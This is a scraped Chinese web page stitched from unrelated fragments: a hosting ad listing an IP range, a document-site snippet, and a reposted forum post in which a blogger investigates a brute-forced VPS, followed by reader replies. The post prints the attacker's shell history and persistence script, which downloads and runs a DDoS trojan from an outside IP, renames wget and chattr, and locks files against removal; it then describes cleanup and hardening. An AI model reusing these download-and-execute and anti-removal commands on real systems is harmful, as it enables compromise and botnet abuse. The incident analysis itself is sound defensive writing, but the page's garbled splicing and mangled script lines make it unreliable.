来源:蜘蛛抓取(WebSpider)
时间:2017-09-08 09:17
标签:
台州人事考试网
||百姓网公众号微信扫码关注百姓网小程序微信扫扫立即体验扫码下载手机客户端免费抢油卡、红包、电影票您正在浏览信息,点击查看更多服务183.134.16.1 台州新段三线高防 冲冲冲& 9999元6月29日 16:22 &...次浏览 &&公司名称:厦门快快网络科技有限公司服务内容:服务范围:所在地:软件园-望海路10号楼联系人:霍霍联系:请使用其他联系方式其他联系:~~~~~~~~不求甚解就是要善于抓住要害~~~~&&~~~~
快快网络独家台州新段,183.134.16,云堤防护,独家策略防C
CPU:I7-4790
内存:32G ECC
硬盘:120G SSD
带宽:100M独享
电信400G防御
移动200G防御
联通50G防御
销售QQ: 霍霍
IP段:183.134.16.*
183.134.16.1
183.134.16.2
183.134.16.3
183.134.16.4
183.134.16.5
183.134.16.6
183.134.16.7
183.134...~~~~~~~~不求甚解就是要善于抓住要害~~~~&&~~~~
快快网络独家台州新段,183.134.16,云堤防护,独家策略防C
CPU:I7-4790
内存:32G ECC
硬盘:120G SSD
带宽:100M独享
电信400G防御
移动200G防御
联通50G防御
销售QQ: 霍霍
IP段:183.134.16.*
183.134.16.1
183.134.16.2
183.134.16.3
183.134.16.4
183.134.16.5
183.134.16.6
183.134.16.7
183.134.16.8
183.134.16.9
183.134.16.10
183.134.16.11
183.134.16.12
183.134.16.13
183.134.16.14
183.134.16.15
183.134.16.16
183.134.16.17
183.134.16.18
183.134.16.19
183.134.16.20
183.134.16.21
183.134.16.22
183.134.16.23
183.134.16.24
183.134.16.25
183.134.16.26
183.134.16.27
183.134.16.28
183.134.16.29
183.134.16.30
183.134.16.31
183.134.16.32
183.134.16.33
183.134.16.34
183.134.16.35
183.134.16.36
183.134.16.37
183.134.16.38
183.134.16.39
183.134.16.40
183.134.16.41
183.134.16.42
183.134.16.43
183.134.16.44
183.134.16.45
183.134.16.46
183.134.16.47
183.134.16.48
183.134.16.49
183.134.16.50
183.134.16.51
183.134.16.52
183.134.16.53
183.134.16.54
183.134.16.55
183.134.16.56
183.134.16.57
183.134.16.58
183.134.16.59
183.134.16.60
183.134.16.61
183.134.16.62
183.134.16.63
183.134.16.64
183.134.16.65
183.134.16.66
183.134.16.67
183.134.16.68
183.134.16.69
183.134.16.70
183.134.16.71
183.134.16.72
183.134.16.73
183.134.16.74
183.134.16.75
183.134.16.76
183.134.16.77
183.134.16.78
183.134.16.79
183.134.16.80
183.134.16.81
183.134.16.82
183.134.16.83
183.134.16.84
183.134.16.85
183.134.16.86
183.134.16.87
183.134.16.88
183.134.16.89
183.134.16.90
183.134.16.91
183.134.16.92
183.134.16.93
183.134.16.94
183.134.16.95
183.134.16.96
183.134.16.97
183.134.16.98
183.134.16.99
183.134.16.100
183.134.16.101
183.134.16.102
183.134.16.103
183.134.16.104
183.134.16.105
183.134.16.106
183.134.16.107
183.134.16.108
183.134.16.109
183.134.16.110
183.134.16.111
183.134.16.112
183.134.16.113
183.134.16.114
183.134.16.115
183.134.16.116
183.134.16.117
183.134.16.118
183.134.16.119
183.134.16.120
183.134.16.121
183.134.16.122
183.134.16.123
183.134.16.124
183.134.16.125
183.134.16.126
183.134.16.127
183.134.16.128
183.134.16.129
183.134.16.130
183.134.16.131
183.134.16.132
183.134.16.133
183.134.16.134
183.134.16.135
183.134.16.136
183.134.16.137
183.134.16.138
183.134.16.139
183.134.16.140
183.134.16.141
183.134.16.142
183.134.16.143
183.134.16.144
183.134.16.145
183.134.16.146
183.134.16.147
183.134.16.148
183.134.16.149
183.134.16.150
183.134.16.151
183.134.16.152
183.134.16.153
183.134.16.154
183.134.16.155
183.134.16.156
183.134.16.157
183.134.16.158
183.134.16.159
183.134.16.160
183.134.16.161
183.134.16.162
183.134.16.163
183.134.16.164
183.134.16.165
183.134.16.166
183.134.16.167
183.134.16.168
183.134.16.169
183.134.16.170
183.134.16.171
183.134.16.172
183.134.16.173
183.134.16.174
183.134.16.175
183.134.16.176
183.134.16.177
183.134.16.178
183.134.16.179
183.134.16.180
183.134.16.181
183.134.16.182
183.134.16.183
183.134.16.184
183.134.16.185
183.134.16.186
183.134.16.187
183.134.16.188
183.134.16.189
183.134.16.190
183.134.16.191
183.134.16.192
183.134.16.193
183.134.16.194
183.134.16.195
183.134.16.196
183.134.16.197
183.134.16.198
183.134.16.199
183.134.16.200
183.134.16.201
183.134.16.202
183.134.16.203
183.134.16.204
183.134.16.205
183.134.16.206
183.134.16.207
183.134.16.208
183.134.16.209
183.134.16.210
183.134.16.211
183.134.16.212
183.134.16.213
183.134.16.214
183.134.16.215
183.134.16.216
183.134.16.217
183.134.16.218
183.134.16.219
183.134.16.220
183.134.16.221
183.134.16.222
183.134.16.223
183.134.16.224
183.134.16.225
183.134.16.226
183.134.16.227
183.134.16.228
183.134.16.229
183.134.16.230
183.134.16.231
183.134.16.232
183.134.16.233
183.134.16.234
183.134.16.235
183.134.16.236
183.134.16.237
183.134.16.238
183.134.16.239
183.134.16.240
183.134.16.241
183.134.16.242
183.134.16.243
183.134.16.244
183.134.16.245
183.134.16.246
183.134.16.247
183.134.16.248
183.134.16.249
183.134.16.250
183.134.16.251
183.134.16.252
183.134.16.253
183.134.16.254
183.134.16.255百姓网提醒您:1)接受服务前请仔细核验对方经营资质,勿信夸张宣传和承诺&
2)任何要求预付定金或付款至个人账号的行为,均可能存在诈骗风险,请提高警惕。小贴士:本页信息由用户及第三方发布,真实性、合法性由发布人负责。详情请阅读
(window.slotbydup = window.slotbydup || []).push({
container: s,
id: cpro_id,
scale: '20.3',
display: 'inlay-fix'
信息设置为“搞定了!”状态后,其他用户将无法查看您的联系方式。您确认搞定了这条信息吗?重新发布后可使用“刷新”将发布时间更新为最新时间,并将信息排到第一页。商户推广合作加盟服务支持合作伙伴|&| 沪公网安备16号3&G:89&GM:105
描述:请填写描述手机号:请填写手机号请填写手机号上传图片:打开微信,扫一扫右侧二维码,即可完成绑定 -->绑定后,您可以:1. 立即在手机上收到用户给您的留言2. 使用手机快速完成付费推广的续费动作3. 第一时间了解到百姓网付费推广最新的促销活动,以及享受微信端独特的促销活动4. 更快速地将信息通过微信分享给好友、同事、朋友圈5. 如果您是招聘类目用户,还能够第一时间接收到新简历通知下载APP无需登录实时接受私信提醒,联系更便捷!或点击下方先登录再进入私信联系台州市路桥区企业2009年度进出口排名_图文_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
台州市路桥区企业2009年度进出口排名
&&台州市路桥区企业2009年度进出口排名
阅读已结束,下载本文需要
想免费下载更多文档?
定制HR最喜欢的简历
下载文档到电脑,同时保存到云知识,更方便管理
还剩5页未读,继续阅读
定制HR最喜欢的简历
你可能喜欢183.134.16.36台州三线高防服务器租用
<font COLOR="#FF4.16.36台州三线高防服务器租用,联系QQ:
&快快网络小强
快快台州三线清洗机房采用最豪华游戏机房清洗设备,搭配天网云擎2017年最新一代毫秒级过滤技术,是目前游戏领域较为高端的产品之一。
I7-0G SSD 3个 电信400G/移动200G/联通50G G口100M独享
台州三线清洗(独家) 4999元
I7-0G SSD 3个 电信500G/移动250G/联通50G G口100M独享
台州三线清洗(独家) 9999元
可选择ip:
183.134.16.1
183.134.16.2
183.134.16.3
183.134.16.4
183.134.16.5
183.134.16.6
183.134.16.7
183.134.16.8
183.134.16.9
183.134.16.10
183.134.16.11
183.134.16.12
183.134.16.13
183.134.16.14
183.134.16.15
183.134.16.16
183.134.16.17
183.134.16.18
183.134.16.19
183.134.16.20
183.134.16.21
183.134.16.22
183.134.16.23
183.134.16.24
183.134.16.25
183.134.16.26
183.134.16.27
183.134.16.28
183.134.16.29
183.134.16.30
183.134.16.31
183.134.16.32
183.134.16.33
183.134.16.34
183.134.16.35
183.134.16.36
183.134.16.37
183.134.16.38
183.134.16.39
183.134.16.40
183.134.16.41
183.134.16.42
183.134.16.43
183.134.16.44
183.134.16.45
183.134.16.46
183.134.16.47
183.134.16.48
183.134.16.49
183.134.16.50
183.134.16.51
183.134.16.52
183.134.16.53
183.134.16.54
183.134.16.55
183.134.16.56
183.134.16.57
183.134.16.58
183.134.16.59
183.134.16.60
183.134.16.61
183.134.16.62
183.134.16.63
183.134.16.64
183.134.16.65
183.134.16.66
183.134.16.67
183.134.16.68
183.134.16.69
183.134.16.70
183.134.16.71
183.134.16.72
183.134.16.73
183.134.16.74
183.134.16.75
183.134.16.76
183.134.16.77
183.134.16.78
183.134.16.79
183.134.16.80
183.134.16.81
183.134.16.82
183.134.16.83
183.134.16.84
183.134.16.85
183.134.16.86
183.134.16.87
183.134.16.88
183.134.16.89
183.134.16.90
183.134.16.91
183.134.16.92
183.134.16.93
183.134.16.94
183.134.16.95
183.134.16.96
183.134.16.97
183.134.16.98
183.134.16.99
183.134.16.100
183.134.16.101
183.134.16.102
183.134.16.103
183.134.16.104
183.134.16.105
183.134.16.106
183.134.16.107
183.134.16.108
183.134.16.109
183.134.16.110
183.134.16.111
183.134.16.112
183.134.16.113
183.134.16.114
183.134.16.115
183.134.16.116
183.134.16.117
183.134.16.118
183.134.16.119
183.134.16.120
183.134.16.121
183.134.16.122
183.134.16.123
183.134.16.124
183.134.16.125
183.134.16.126
183.134.16.127
183.134.16.128
183.134.16.129
183.134.16.130
183.134.16.131
183.134.16.132
183.134.16.133
183.134.16.134
183.134.16.135
183.134.16.136
183.134.16.137
183.134.16.138
183.134.16.139
183.134.16.140
183.134.16.141
183.134.16.142
183.134.16.143
183.134.16.144
183.134.16.145
183.134.16.146
183.134.16.147
183.134.16.148
183.134.16.149
183.134.16.150
183.134.16.151
183.134.16.152
183.134.16.153
183.134.16.154
183.134.16.155
183.134.16.156
183.134.16.157
183.134.16.158
183.134.16.159
183.134.16.160
183.134.16.161
183.134.16.162
183.134.16.163
183.134.16.164
183.134.16.165
183.134.16.166
183.134.16.167
183.134.16.168
183.134.16.169
183.134.16.170
183.134.16.171
183.134.16.172
183.134.16.173
183.134.16.174
183.134.16.175
183.134.16.176
183.134.16.177
183.134.16.178
183.134.16.179
183.134.16.180
183.134.16.181
183.134.16.182
183.134.16.183
183.134.16.184
183.134.16.185
183.134.16.186
183.134.16.187
183.134.16.188
183.134.16.189
183.134.16.190
183.134.16.191
183.134.16.192
183.134.16.193
183.134.16.194
183.134.16.195
183.134.16.196
183.134.16.197
183.134.16.198
183.134.16.199
183.134.16.200
183.134.16.201
183.134.16.202
183.134.16.203
183.134.16.204
183.134.16.205
183.134.16.206
183.134.16.207
183.134.16.208
183.134.16.209
183.134.16.210
183.134.16.211
183.134.16.212
183.134.16.213
183.134.16.214
183.134.16.215
183.134.16.216
183.134.16.217
183.134.16.218
183.134.16.219
183.134.16.220
183.134.16.221
183.134.16.222
183.134.16.223
183.134.16.224
183.134.16.225
183.134.16.226
183.134.16.227
183.134.16.228
183.134.16.229
183.134.16.230
183.134.16.231
183.134.16.232
183.134.16.233
183.134.16.234
183.134.16.235
183.134.16.236
183.134.16.237
183.134.16.238
183.134.16.239
183.134.16.240
183.134.16.241
183.134.16.242
183.134.16.243
183.134.16.244
183.134.16.245
183.134.16.246
183.134.16.247
183.134.16.248
183.134.16.249
183.134.16.250
183.134.16.251
183.134.16.252
183.134.16.253
183.134.16.254
183.134.16.255
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。服务器被黑之后的心路历程
23:02:50 +08:00 · 9387 次点击
服务器被黑之后的心路历程
不久前读了一篇黑客故事( ),读完此文后,才意识到我的机器是处于裸奔状态,便饶有兴致地去服务器检查了一下日志。发现还真有人在尝试对我的机器进行暴力破解(一下简称爆破),而且攻势还挺猛,当天就有1w+的暴力尝试!但是当时并没有特别去在意,被黑这种事情应该不会发生的......吧......
只是,几天之后的某一天(2月3号)深夜,趴在床上休闲的看邮件时,收到了DO在1月29号发的警告邮件(DO:Digital Ocean, 一个vps主机提供商,这个博客就是架设在我在DO的vps上):
We are sorry to report that we have detected what appears to be a large flood of traffic from one or more of your servers that is disrupting the normal traffic flow for other users.
To prevent this traffic from causing further disruption, we have disabled the networking interface on the server or servers involved...
什么情况!我的服务器被黑了!!?DO把我的服务封了!!?立马打开浏览器访问我的博客主页,果然挂了。然后尝试ssh登录到主机,连接不上,果然主机被封了!而且这邮件是五天前发的,我现在才知道!吓得当时我的表情是这样的:
第二天起床之后,立马跑到自习室进入忘我模式,开始追查原因!
服务器网络被禁,没法ssh登录。幸好, DO 提供了Web console接口,可以通过Web界面来登录服务器。
“DO把我服网络封禁了,那贼现在应该无法控制我的服务器”,心里再一次暗想着,“现在暂时无需修改密码来防止主机被再次控制,先先找出问题所在吧。”
再次打开邮件,观察DO提供的报警信息:
We are sorry to report that we have detected what appears to be a large flood of traffic from one or more of your servers that is disrupting the normal traffic flow for other users.
To prevent this traffic from causing further disruption, we have disabled the networking interface on the server or servers involved...
“难道服务器被劫持作为肉鸡来攻击其它的网络了!?”,那是一头雾水啊,完全不清楚攻击者究竟利用我服做了什么事情,看起来好像是被当肉鸡了哎 ╮(╯▽╰)╭。
所以接下来理所当然的去查看有问题的进程了。
既然是traffic flood,那就先从网络检查起。
$ sudo ss -p
Recv-Q Send-Q
Local Address:Port
Peer Address:Port
127.0.0.1:36512
183.60.149.202:43200
users:((&icnanker&,14519,4))
不出所料果然看到了一个很可疑的程序:icnanker,它在不停的尝试往183.60.149.202:43200发送tcp syn包!立马搜这个IP的信息,只发现这是东莞的一个IP。那继续吧,先找出所有有问题的进程再说。
果然在进程列表中找到了三个很可疑的进程:
0:43 /etc/init.d/apache2.sh
23:41 /usr/bin/icnanker
0:00 /usr/bin/.sshd
第一,我没有装apache,apache2.sh这样的名字实在是太可疑了。
第二,.sshd这个进程的名字更可疑,sshd守护进程是sshd,伪装得太不像了。
第三,只有这三个进程都是在Jan28启动的,也就是1月28号,这让我联想到29号造成的traffic flood。肯定有问题。
接着下意识的去翻阅登录日志:
# grep &Accepted& /var/log/auth.log.1
Jan 26 16:55:49 mon sshd[13955]: Accepted password for root from 61.160.247.8 port 1604 ssh2
Jan 28 17:12:03 mon sshd[30407]: Accepted password for root from 61.166.50.23 port 3343 ssh2
# grep &Jan 2[5-8] .*sshd.*Failed& /var/log/auth.log.1 | wc
Jan 26和 Jan 28都有人在我的机器上登录过root账号!Ip来源发现分别是云南和江苏的,也是非常诡异。接着让我更吃惊的是从Jan 25到Feb 28,共有2w+的暴破尝试!
在看到这些结果的瞬间其实我就明白了为何我会被攻破——因为我的密码设置得非常非常简单,简单到和“123456”这样的密码差不多。这个时候我的表情是这样的:
立马切换到root用户,查看root命令记录,看看能不能追踪到这个家伙在我机器上做过什么,同时在心里像上帝祈祷希望他没擦去脚印。
cp /usr/bin/wget /usr/bin/vget
cp /usr/bin/chattr /usr/bin/lockr
chmod 0 /usr/bin/chmod 0 /usr/bin/wget
lockr +i /usr/bin/lockr +i /usr/bin/wget
chmod 0755 /usr/bin/chmod 0755 /usr/bin/lockr
vget http://183.60.149.202:8080/apache2.sh
mv /root/apache2.sh /etc/init.d/apache2.sh
chmod 0755 /etc/init.d/apache2.sh
nohup sh /etc/init.d/apache2.sh &/dev/null 2&&1 &
lockr +i /etc/init.d/apache2.sh
vi /etc/rc.local
lockr +i /etc/rc.local
less /etc/init.d/apache2.sh
感慨万千,万千感慨,“还好,这个傻逼没有擦去脚印”,哈哈哈哈哈。。
做抱拳状,站起,出自习室,接开水,回来,继续!
“我需要知道,这家伙究竟对我的机器干了些什么!”
从上面的命令记录来看,/etc/init.d/apache2.sh这个脚本有很大的嫌疑,查看脚本内容:
# cat /etc/init.d/apache2.sh
while [ 1 -gt 0 ];do
Get=&/usr/bin/vget&
Lok=&/usr/bin/lockr&
Bak=&/usr/bin/.filebak&
hosts=&/etc/hosts.bak&
File=&/usr/bin/icnanker&
&$hosts& ];then
cp -f /etc/hosts.deny /etc/hosts.bak
lockr +i /etc/hosts.bak
&$Lok& ];then
cp -f /usr/bin/chattr /usr/bin/lockr
cp -f /usr/bin/chattr /usr/bin/.locks
cp -f /usr/bin/.locks /usr/bin/lockr
chmod 0755 /usr/bin/lockr
chmod 0755 /usr/bin/.locks
lockr +i /usr/bin/lockr
lockr +i /usr/bin/.locks
&$Get& ];then
cp -f /usr/bin/wget /usr/bin/vget
cp -f /usr/bin/wget /usr/bin/.bget
cp -f /usr/bin/.bget /usr/bin/vget
chmod 0755 /usr/bin/vget
chmod 0755 /usr/bin/.bget
lockr +i /usr/bin/vget
lockr +i /usr/bin/.bget
Exist=`ss|grep 183.60.149.202:43200|grep -v &grep& `
if [ -z &$Exist& ];then
lockr -i /usr/bin/.filebak
lockr -i /usr/bin/icnanker
chmod 0755 /usr/bin/.filebak
chmod 0755 /usr/bin/icnanker
&$File& ];then
&$Bak& ];then
rm -f /etc/init.d/icnanker;rm -f /etc/init.d/icnanker.1
vget -P /etc/init.d/ vget http://183.60.149.202:8080/icnanker
mv /etc/init.d/icnanker /usr/bin/icnanker
cp -f /usr/bin/.filebak /usr/bin/icnanker
pkill icnanker;pkill icnanker
chmod 0755 /usr/bin/icnanker
lockr +i /usr/bin/icnanker
/usr/bin/icnanker
&$Bak& ];then
cp -f /usr/bin/icnanker /usr/bin/.filebak
chmod 0755 /usr/bin/.filebak
lockr +i /usr/bin/.filebak
chmod 0 /usr/bin/wget
lockr +i /usr/bin/wget
chmod 0 /usr/bin/chattr
lockr +i /usr/bin/chattr
chmod 0 /usr/lib/sftp-server
lockr +i /usr/lib/sftp-server
lockr -i /etc/hosts.deny;cp /etc/hosts.bak /etc/hosts.deny;lockr +i /etc/hosts.deny
仔细看下来,这应该是&icnanker&的后台守护程序,确保&icnanker&一直在运行。
那&icnanker&究竟是干什么的,究竟在我的系统上干了什么,服务器还有什么其他的“坏家伙”在?
尝试打开“icnanker”,看看“icnanker”的内容,发现它是二进制的,无法查看该木马的具体作用。但是根据 DO 的检测、apache2.sh脚本内容以及&icnanker&一直在进行着的大量tcp链接尝试可以看出,似乎这是一个DDoS木马,syn flood。
于是开始在网络上搜索该木马的详细信息,一番尝试之后,还是没能找到关于这个木马的详细信息,“那就先放着,先揪出其他木马再说”。
此时的我有点慌乱和无头绪,“对病毒一点都不了解呢”,“不过,这点问题可难不倒我,移步google!”
经过一番查找之后,发现了 clamAV 这个工具,一个很popular的开源病毒引擎,能够扫描检测木马、病毒和恶意程序,正乃我所需啊!!
马上用 clamAV 神器扫描全站文件,果然还发现了不少其他的木马:
/usr/bin/icnanker
/usr/bin/.filebak
/usr/bin/.sshd
/usr/bin/lsof
/usr/bin/bsd-port/getty
/bin/netstat
Oh, no!!!
ps, netstat, ss, lsof 这些很常用的监控服务器状态的系统工具全部被掉包了!
“真是危险,要是没有在全机进行病毒搜索的话,很容易就会又被莫名其妙的感染了!”,心里直冒冷汗。
这个时候,我的表情是这样的:
嗯,心情非常沉重。非常沉重。非常非常的沉重。
怀着沉重的心情,开始出其意料的冷静思考,得出以下推断(事实):
攻击者利用暴破登录服务器,1月26号成功突破,1月28号种下木马,29号开始进行tcp syn flood,flood持续一段时间后,被DO检测到,封了我的主机。
攻击者没有清除日志,没有做对机器有极大破坏性的事情。
攻击者不仅仅是种下&icnanker&这一个显而易见的木马,还用一些其他的木马掉包了本机上的关键程序。
那么,我需要反抗了。
杀掉木马进程
# kill 13648
# 杀掉apache2.sh
# kill 14519
# 杀掉&icnanker&
# kill 26595
# 杀掉.sshd
再次查看命令记录和apache2.sh,确定清除木马的步骤:
cp /usr/bin/wget /usr/bin/vget
cp /usr/bin/chattr /usr/bin/lockr
chmod 0 /usr/bin/chmod 0 /usr/bin/wget
lockr +i /usr/bin/lockr +i /usr/bin/wget
chmod 0755 /usr/bin/chmod 0755 /usr/bin/lockr
vget http://183.60.149.202:8080/apache2.sh
mv /root/apache2.sh /etc/init.d/apache2.sh
chmod 0755 /etc/init.d/apache2.sh
nohup sh /etc/init.d/apache2.sh &/dev/null 2&&1 &
lockr +i /etc/init.d/apache2.sh
vi /etc/rc.local
lockr +i /etc/rc.local
less /etc/init.d/apache2.sh
# cat /etc/init.d/apache2.sh
while [ 1 -gt 0 ];do
Get=&/usr/bin/vget&
Lok=&/usr/bin/lockr&
Bak=&/usr/bin/.filebak&
hosts=&/etc/hosts.bak&
File=&/usr/bin/icnanker&
&$hosts& ];then
cp -f /etc/hosts.deny /etc/hosts.bak
lockr +i /etc/hosts.bak
&$Lok& ];then
cp -f /usr/bin/chattr /usr/bin/lockr
cp -f /usr/bin/chattr /usr/bin/.locks
cp -f /usr/bin/.locks /usr/bin/lockr
chmod 0755 /usr/bin/lockr
chmod 0755 /usr/bin/.locks
lockr +i /usr/bin/lockr
lockr +i /usr/bin/.locks
&$Get& ];then
cp -f /usr/bin/wget /usr/bin/vget
cp -f /usr/bin/wget /usr/bin/.bget
cp -f /usr/bin/.bget /usr/bin/vget
chmod 0755 /usr/bin/vget
chmod 0755 /usr/bin/.bget
lockr +i /usr/bin/vget
lockr +i /usr/bin/.bget
Exist=`ss|grep 183.60.149.202:43200|grep -v &grep& `
if [ -z &$Exist& ];then
lockr -i /usr/bin/.filebak
lockr -i /usr/bin/icnanker
chmod 0755 /usr/bin/.filebak
chmod 0755 /usr/bin/icnanker
&$File& ];then
&$Bak& ];then
rm -f /etc/init.d/rm -f /etc/init.d/icnanker.1
vget -P /etc/init.d/ vget http://183.60.149.202:8080/icnanker
mv /etc/init.d/icnanker /usr/bin/icnanker
cp -f /usr/bin/.filebak /usr/bin/icnanker
pkill icnanker
chmod 0755 /usr/bin/icnanker
lockr +i /usr/bin/icnanker
/usr/bin/icnanker
&$Bak& ];then
cp -f /usr/bin/icnanker /usr/bin/.filebak
chmod 0755 /usr/bin/.filebak
lockr +i /usr/bin/.filebak
chmod 0 /usr/bin/wget
lockr +i /usr/bin/wget
chmod 0 /usr/bin/chattr
lockr +i /usr/bin/chattr
chmod 0 /usr/lib/sftp-server
lockr +i /usr/lib/sftp-server
lockr -i /etc/hosts.cp /etc/hosts.bak /etc/hosts.lockr +i /etc/hosts.deny
哼,╭(╯^╰)╮,居然敢这样玩我。这几行命令和脚本试图干扰我把病毒从机器上删除哎:
第一步, 将/usr/bin/chattr复制到/usr/bin/lockr
cp /usr/bin/chattr /usr/bin/lockr
第二步, 将chattr变为不可读不可写不可执行的权限
chmod 0 /usr/bin/chattr
第三步, 锁住chattr,让其变为不可修改
lockr +i /usr/bin/chattr
第四步, 锁住所有其他木马,让其不可删除,如icnanker等。
lockr +i /usr/bin/icnanker
第五步, 将木马程序加入系统开机自启脚本( /etc/rc.local )中,每次开机自动运行木马。
这样一来, 如果不懂这段逻辑的话, 要删除病毒如icnanker都会被莫名其妙被拒绝了:
# rm /usr/bin/icnanker
rm: cannot remove ‘icnanker’: Operation not permitted
幸好, 我这个人有非常可怕的耐心。马上去查了chattr是干什么的。原来,linux的文件还能设置一些附带的属性。比如有一个属性'i',它的意思就是&immutable&,即限制文件不可更改(删除、修改文件内容、改变文件权限等)。那么通过lockr +i /usr/bin/icnanker,给icnanker附上了'i'属性之后,就让我没办法删除icnanker了!
“那把icnanker的'i'属性去除呗”, 这是一个很直接的想法。但是这货为了防止我这么做,还记得吗,它把 chattr 这个工具通过 chmod 0 /usr/bin/chattr命令将chattr的执行权限去除了。换言之,我没法运行chattr来去除icnanker的'i'属性!
那是不是就没办法删除这些木马了呢?
NO,NO,NO。将计就计就好了。
还记得吗, 上面那段脚本,把/usr/bin/chattr复制到了/usr/bin/lockr。那我直接使用lockr把chattr解锁不就行了?
# lockr -i /usr/bin/chattr
# chmod 755 /usr/bin/chattr
# chattr -i /usr/bin/icnanker
# rm /usr/bin/icnanker
呵呵,这样,就把攻击者设下的圈套一下就解开了。做到这里我觉得攻击者的智商其实值得商榷的。我在智商上,其实应该更高一筹。小小的自娱自乐了一把。。。
木马,就这样一步一步的全部被我搜集起来,过些时候准备一把火烧了它。
接下来,是思考对策的时候了。这次暴破表面上全是弱口令惹的祸,其实还是因为太懒,明明知道很危险,却存在侥幸心理。“嗯,这次一定要采取全面的安全策略!”
进行一些研究之后,准备从两个大方向入手,防护机制和检测机制。一个是加强安全性,增加他们(hacker)进攻难度。另一个是加强警戒,一旦发现有人入侵,能立马知道并且快速响应。
(SSH)登录安全策略
* **使用强密码!!**绝大多数暴破都是因为该死的弱口令!
* **设置ssh不允许root登录!**因为大多数登录暴破都是对于root用户进行暴破的!
* **不要泄露主机用户名等信息!!**这主要是为了防止针对性暴破,如果别人知道你的用户名,又对你有一些了解的话,其猜中你密码的概率会大大加大。
* **检查暴破IP并且封禁之!**有个非常好用的工具,其大名为“fail2ban”,它可以扫描主机的登录日志,并且限制单IP失败登录次数,如果超过限制,就会封禁该IP。
防火墙的作用主要是对外关闭不必要的网络服务,减少由常规程序本身的漏洞而带来的隐患。同样,有一个非常好用的工具,“ufw”,可以非常方便的设置防火墙:
# ufw allow 80/tcp
# ufw allow ssh
只开启两个服务,web service和ssh service。
还有一些建议
事实上,攻击我服的方式太多了,暴力破解密码登录只是其中一种,还有很多是利用软件漏洞进行的,还记得上一年一连串令人发指的漏洞吗:HeartBleed, Shellshock!!为了牢记这些惨痛的教训(别人身上的),谨记:
* **关注安全动态,即时更新软件安全补丁!**
* **限制服务,只让该运行的服务运行!**
* **在安装非官方包的时候,提高警惕,小心被掉包!**
建好城墙,就该部署哨兵了。
那么该如何监测服务器的健康状态呢?
在linux下还是有一些工具可以使用的,经过一番对比,我最终选择了。她可以检测linux关键文件的变化情况,比如/usr/bin目录下面的文件。所以我配置了一个crontab,每天早上3点检查一遍系统关键文件,看看是否有问题,并且邮件报告给我。
邮件crontab配置:
30 14 * * * /usr/sbin/tripwire --check | mail -s &Tripwire report for `uname -n`&
-r report.tripwire
这样,每天我都可以通过文件查看系统是否被破坏了。
汲取这次教训,为了能每天检测用户登录和情况,我特意写了一个脚本来检查昨天系统的登录情况:
login_review.sh:
#! /usr/bin/env bash
# monitor yesterday's login via ssh, and send report email
date=`date -d &yesterday& +&%b %e&`
yesterday_acceptedlog=`grep &${date}.*sshd.*Accepted& /var/log/auth.log | grep -v &sudo&`
fail=`grep &${date}.*sshd.*Failed& /var/log/auth.log | grep -v &sudo& | wc -l`
success=`printf &%s& &$yesterday_acceptedlog& |wc -l`
if [ $success -gt 0 ]
warn=&[WARN] &
html=&&!doctype html&
&head&&title&${warn}SSH Login Reports for `uname -n` at $date &/title&&/head&
&div class=\&result\&&
&strong&Success logins:&/strong& $success &br /&
&table border=\&1\& style=\&border-collapse:\&&
&th&Time&/th&
&th&User&/th&
&th&Login Method&/th&
`echo $yesterday_acceptedlog | awk '{if(length !=0)printf \&&tr&&td&%s&/td&&td&%s&/td&&td&%s (%s:%s)&/td&&/tr&\n\&,$3,$9,$7,$11,$13}'`
&strong&Failed Trys: &/strong& $fail &br /&
case $1 in
-d | --debug)
printf &Success logs: %d\n%s\nRendered Html:\n%s& $success &$yesterday_acceptedlog& &$html&
echo $html | mail -s &${warn}SSH Login Report for `uname -n` at $date&
-r report.login_review -a &Content-type: text/html&
然后也配置一个crontab,每天都检测:
25 14 * * * /usr/local/bin/login_review.sh
这样,我每天就能收到这样的两份报表了:
╮(╯▽╰)╭
博客停了将近一个星期之后,做好了基本的防护,小心翼翼的将服务器再次开启。(以上的安全策略的实施也是在服务开启之后一直在进行的)
服务器重新开启的那天,通过DO的运维界面查看被攻击的那天的流量情况:
可以看到29号那天tcp syn flood流量达到了140Mbps!心有余悸啊心有余悸。
然后接下来的几天,每天都看fail2ban查看被封禁的ip、看报表查看系统健康状况。效果显著,每天的暴破失败尝试量从上万成功降低到500以内。并且至今未出现过问题。
Cheers!这个时候,我的表情是这样的:
(原文来自:
63 回复 &| &直到
23:47:43 +08:00
& & 23:25:06 +08:00
话说这里不欢迎全文转载。
& & 23:25:30 +08:00
你为何不用公钥验证。。。
不仅方便,而且不会有让人破解的可能性。。。
密码总是会被破解,但是公钥就不一样了。
另外如果被入侵了,建议直接Rebuild 一下,而不是东找西找,企图把病毒揪出来。。。
再另外,如果你想强化SSH的话,第一步应该是将它放到非标准端口上,这样就可以大大减少被暴力破解的数量。
& & 23:29:20 +08:00 via iPad
绝大多数都是无用功
& & 23:31:54 +08:00
1. SSH只用公钥验证的话不太符合我的使用场景,因为经常需要在其他的电脑上登录。
2. 密码不会总会被破解的,使用强密码加上fail2ban之后密码破解难度会加大很多的。另外,禁止了root密码登录之后,攻击者很难知道我主机的小号用户名,就基本上很难破解了。
3. 因为以前没有被入侵过,所以这次我是带着实验的目的做一次实践的。
4. 放在非标准端口上我觉得并不能多大程度上解决问题,因为做一下端口扫描就可以了。
& & 23:32:35 +08:00
@ 怎么说?求意见!
& & 23:32:38 +08:00 via iPhone
233333好欢乐
& & 23:33:08 +08:00
user + ssh key + firewalld 能防绝大多数脚本小子
再加上 selinux 的话就更棒了
一直不清楚为什么很多人都直接关闭 selinux 的
& & 23:56:06 +08:00
@ 话说非标准这个还是挺有用的,因为大部分是批量扫描,只有单独针对你的时候才会区扫描你的端口,我测试发现很少看到登陆信息了。
& & 23:59:07 +08:00
ssh端口都不改,谈什么安全。
& & 00:03:49 +08:00
这样说来确实通过改掉ssh端口能解决大量批量扫描的问题,回头我也做下测试 :)
& & 00:06:37 +08:00 via iPhone
@ 改端口照样扫出来。
& & 00:07:32 +08:00 via Android
我刚才一看也是好多爆密码的…
& & 00:11:34 +08:00
防火墙大法好
& & 00:13:03 +08:00 via Android
1.既然用密码为什么不用复杂的
2.扫端口照样扫出来,但是如果在22上布置xinetd探针,尝试22的直接屏蔽IP呢?centos默认防火墙返回hostunreachable就是为了迷惑扫端口的
3.iptables hole punching,用ping打开端口
@
& & 00:14:40 +08:00 via iPhone
@ 所以说直接关了ssh不就万事大吉,配置好服务后用serial console访问就可以了。。
& & 00:16:15 +08:00
